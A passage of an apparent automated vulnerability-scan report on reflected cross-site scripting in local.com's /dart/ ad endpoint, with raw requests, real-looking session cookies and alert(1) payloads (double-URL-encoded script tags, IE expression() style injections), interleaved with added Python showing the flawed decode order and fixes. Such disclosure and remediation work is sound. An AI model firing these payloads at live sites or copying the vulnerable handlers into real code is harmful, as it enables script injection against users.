Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1062
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:15 GMT
Connection: close
Content-Length: 1062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services629be';alert(1)//3d8ca4cb923;city=dallas_tx;sz=728x90;ord=1296748812638?" type="text/javascript">
...[SNIP]...

1.456. http://www.local.com/dart/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1 was submitted in the cat parameter. This input was echoed as 14aca"><script>alert(1)</script>e268f1e14c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1107
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:15 GMT
Connection: close
Content-Length: 1107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services14aca"><script>alert(1)</script>e268f1e14c1;city=dallas_tx;sz=728x90;ord=1296748812638?" target="_blank">
...[SNIP]...
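
Findings 1.455 and 1.456 are the same bug seen through two sinks: the value of cat is validated while it is still percent-encoded once (%2522, %253e), and only afterwards decoded a second time, so the filter never sees the quote and angle brackets that end up in the page. Note that in the excerpt shown for 1.455 the single quote lands inside a double-quoted src attribute of the DoubleClick script tag, where it terminates nothing; the attribute breakout in 1.456 is the one the response excerpt actually demonstrates. The Python below is an added illustration, not code from the scanner or from local.com: the blacklist, the link builders and the "cat=" prefix handling are hypothetical reconstructions of the behaviour the report describes, and the wire value is the cat parameter from the 1.456 request. It shows the reported order, the minimal change the remediation text asks for (validate after canonicalisation) and the preferred fix (decode once, encode on output), plus a JavaScript string-literal encoder for the script context the 1.455 remediation warns about.

```python
import html
import json
from typing import Optional
from urllib.parse import quote, unquote

# cat parameter from the request in finding 1.456, exactly as sent on the wire.
WIRE_CAT = ('cat%3dfinancial_services14aca%2522%253e%253cscript%253ealert%25281'
            '%2529%253c%252fscript%253ee268f1e14c1')

# Hypothetical character blacklist standing in for the site's filter.
FORBIDDEN = set('<>"\'')
AD_BASE = 'http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;cat='


def server_decode(wire: str) -> str:
    """The single URL-decode the web server performs before the application runs."""
    return unquote(wire)


def passes_filter(value: str) -> bool:
    return not (FORBIDDEN & set(value))


def strip_prefix(value: str) -> str:
    """The parameter arrives as 'cat=<category>'; keep only the category."""
    return value.split('=', 1)[1] if '=' in value else value


def ad_link_vulnerable(wire: str) -> Optional[str]:
    """Order reproduced from the report: validate, decode a second time, reflect raw.
    The filter inspects '%22%3e' and never the '">' it becomes one step later.
    Returns None when the filter blocks the request."""
    once = server_decode(wire)
    if not passes_filter(once):
        return None
    twice = unquote(once)  # the unnecessary second decode
    return f'<a href="{AD_BASE}{strip_prefix(twice)};sz=728x90" target="_blank">'


def ad_link_validate_after_decode(wire: str) -> Optional[str]:
    """Minimal change the remediation text asks for: canonicalise first, validate last.
    The double decode is still there, but the filter now sees the real characters."""
    twice = unquote(server_decode(wire))
    if not passes_filter(twice):
        return None
    return f'<a href="{AD_BASE}{strip_prefix(twice)};sz=728x90" target="_blank">'


def ad_link_safe(wire: str) -> str:
    """Preferred fix: decode once, treat the result as data, and encode it for the URL
    and then for the attribute context on output. No blacklist is needed."""
    cat = strip_prefix(server_decode(wire))
    url = AD_BASE + quote(cat, safe='') + ';sz=728x90'
    return f'<a href="{html.escape(url, quote=True)}" target="_blank">'


def js_single_quoted(value: str) -> str:
    """For a single-quoted JavaScript string context: emit a literal whose body can
    neither terminate the quotes nor close the enclosing <script> block."""
    body = json.dumps(value)[1:-1]  # escapes backslash and double quote
    body = body.replace("'", "\\'").replace('<', '\\u003c').replace('>', '\\u003e')
    return "'" + body + "'"
```

The benign case is worth keeping in the test set: a normal category such as cat=financial_services must still produce a working ad link after the fix, otherwise the blacklist tends to be quietly relaxed again.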

1.457. http://www.local.com/dart/ [css parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023 was submitted in the css parameter. This input was echoed as 36ffb"style="x:expression(alert(1))"4094d82a023 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&css=banner36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748883062&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 890
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:29 GMT
Connection: close
Content-Length: 890


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<body class="banner36ffb"style="x:expression(alert(1))"4094d82a023">
...[SNIP]...

1.458. http://www.local.com/dart/ [l parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd27'%3b570d9e9b527 was submitted in the l parameter. This input was echoed as 9cd27';570d9e9b527 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the response excerpt below shows the reflection inside the double-quoted src attribute of a <script> tag (the DoubleClick adj URL), where an unescaped single quote does not by itself break out of the attribute; the confirmed breakout for the same parameter is the double-quote injection in issue 1.459.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
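The two reflection contexts this report keeps flagging for /dart/ are a double-quoted HTML attribute carrying the DoubleClick URL (the expression() proof of concept above) and, per the scanner, a single-quoted JavaScript string. The following Python is an added illustration, not code from the report or from local.com: it rebuilds the DART URL the way a naive handler would (hypothetical function names; sample values copied from the report's payloads), shows the attribute breakout, and then the two-layer fix, percent-encoding each URL component and attribute-encoding the result, plus the safe way to embed a value in a script literal when echoing it there cannot be avoided.

```python
import html
import json
from urllib.parse import quote

# Constructed inputs modelled on the report's payloads; the handler and helper
# names below are assumptions, not local.com's code.
ATTR_PAYLOAD = 'Dallas, TX9cd27"style="x:expression(alert(1))"570d9e9b527'
JS_PAYLOAD = "Dallas, TX9cd27';570d9e9b527"


def dart_url_vulnerable(p, kw, city, sz, ord_):
    """Raw concatenation: quotes and DART separators in any parameter reach the URL."""
    return (f"http://ad.doubleclick.net/adj/{p};dcopt=ist;kw={kw};pos=;tile=;"
            f"city={city};sz={sz};ord={ord_}?")


def render_attr_vulnerable(city):
    url = dart_url_vulnerable("locm.pp", "banks", city, "350x300", "1296748882748")
    # The URL lands in a double-quoted attribute with no encoding at all.
    return f'<a href="{url}" target="_blank">'


def dart_url_hardened(p, kw, city, sz, ord_):
    """Percent-encode each component with safe='' so ; / ? ' " are all encoded:
    a value can neither add DART key-value pairs nor carry a quote."""
    def enc(v):
        return quote(str(v), safe="")
    return (f"http://ad.doubleclick.net/adj/{enc(p)};dcopt=ist;kw={enc(kw)};"
            f"pos=;tile=;city={enc(city)};sz={enc(sz)};ord={enc(ord_)}?")


def render_attr_hardened(city):
    url = dart_url_hardened("locm.pp", "banks", city, "350x300", "1296748882748")
    # Second layer for the HTML context: attribute-encode the whole value.
    return f'<a href="{html.escape(url, quote=True)}" target="_blank">'


def js_literal_vulnerable(value):
    """Single-quoted JS string built by concatenation: a ' in value ends it."""
    return f"var city = '{value}';"


def js_literal_hardened(value):
    """json.dumps yields a JS-compatible double-quoted literal with quotes,
    backslashes, control characters and non-ASCII (incl. U+2028/9) escaped;
    '</' is additionally escaped so the value cannot close the <script> element."""
    return "var city = " + json.dumps(value).replace("</", "<\\/") + ";"


if __name__ == "__main__":
    print(render_attr_vulnerable(ATTR_PAYLOAD))
    print(render_attr_hardened(ATTR_PAYLOAD))
    print(js_literal_vulnerable(JS_PAYLOAD))
    print(js_literal_hardened(JS_PAYLOAD))
```

The vulnerable renderer emits the report's `"style="x:expression(alert(1))"` verbatim inside the href; the hardened one leaves only the four quotes of the tag itself, because every quote, parenthesis and colon from the input is percent-encoded before the attribute encoder sees it. In the script case, json.dumps does not escape a single quote, but it never needs to: the literal it produces is double-quoted, so the report's `';` payload is inert data.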

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX9cd27'%3b570d9e9b527 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:34 GMT
Connection: close
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx9cd27';570d9e9b527;sz=350x300;ord=1296748882748?" type="text/javascript">
...[SNIP]...

1.459. http://www.local.com/dart/ [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the l request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b was submitted in the l parameter. This input was echoed as fe54b"><script>alert(1)</script>710dcff3a6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the l request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
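The remediation above is about order of operations: the server has already decoded the query string once, so an application-side second decode performed after validation lets %253c pass the filter and arrive as <. The Python below is an added model of that mistake and of the two correct orderings; it is not local.com's code, and the handler names, the block-list and the location allow-list are assumptions. The two request values are constructed from the report's payloads for the l parameter.

```python
import html
import re
from urllib.parse import quote, unquote, unquote_plus

# Constructed request values mirroring the report: single URL-encoding (what the
# filter catches) and double URL-encoding (what slips past it).
SINGLE_ENCODED = "Dallas%2c+TXfe54b%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e710dcff3a6b"
DOUBLE_ENCODED = "Dallas%2c+TXfe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b"

BLOCKED_CHARS = ('<', '>', '"', "'")      # assumed block-list of the original filter
LOCATION_RE = re.compile(r"^[A-Za-z0-9 ,.\-]{1,64}$")   # assumed allow-list for "City, ST"


def server_decode(raw):
    """The web server decodes the query string exactly once ('+' becomes a space)."""
    return unquote_plus(raw)


def emit(value):
    """Output encoding for the context: a URL component inside an HTML attribute."""
    return ('<a href="http://ad.doubleclick.net/jump/locm.pp;city='
            + html.escape(quote(value, safe=""), quote=True) + '" target="_blank">')


def dart_vulnerable(raw_l):
    """Validate, then decode a second time: the ordering the report describes."""
    value = server_decode(raw_l)
    if any(c in value for c in BLOCKED_CHARS):
        return None                          # request rejected by the filter
    value = unquote(value)                   # custom second decode, after validation
    return f'<a href="http://ad.doubleclick.net/jump/locm.pp;city={value}" target="_blank">'


def dart_fixed(raw_l):
    """Preferred fix: no second decode; validate the canonical value; encode on output."""
    value = server_decode(raw_l)
    if not LOCATION_RE.fullmatch(value):
        return None
    return emit(value)


def dart_canonicalise_then_validate(raw_l):
    """If a second decode really is required, it belongs before validation, so the
    filter sees the same bytes that will reach the output."""
    value = unquote(server_decode(raw_l))    # all custom canonicalisation first
    if any(c in value for c in BLOCKED_CHARS):
        return None
    return emit(value)


if __name__ == "__main__":
    print(dart_vulnerable(SINGLE_ENCODED))   # None: the filter catches %3c
    print(dart_vulnerable(DOUBLE_ENCODED))   # <script>alert(1)</script> reflected
    print(dart_fixed(DOUBLE_ENCODED))        # None: a literal % is not a valid location
```

With the vulnerable ordering, the double-encoded value reaches the filter as `%22%3e%3cscript...`, contains none of the blocked characters, and is only turned into `"><script>` by the second decode that follows. Both corrected handlers reject it, for different reasons: the allow-list never accepts a stray percent sign, and the canonicalise-first variant decodes it fully before looking for `<`.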

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TXfe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:34 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_txfe54b"><script>alert(1)</script>710dcff3a6b;sz=350x300;ord=1296748882748?" target="_blank">
...[SNIP]...

1.460. http://www.local.com/dart/ [ord parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the ord request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80630'%3bc205c1fb2ef was submitted in the ord parameter. This input was echoed as 80630';c205c1fb2ef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the response excerpt below shows the reflection inside the double-quoted src attribute of a <script> tag (the DoubleClick adj URL), where an unescaped single quote does not by itself break out of the attribute; the confirmed breakout for the same parameter is the double-quote injection in issue 1.461.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=129674888274880630'%3bc205c1fb2ef&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:28 GMT
Connection: close
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=129674888274880630';c205c1fb2ef?" type="text/javascript">
...[SNIP]...

1.461. http://www.local.com/dart/ [ord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the ord request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e was submitted in the ord parameter. This input was echoed as e5d33"style="x:expression(alert(1))"2ea0dbdbd7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
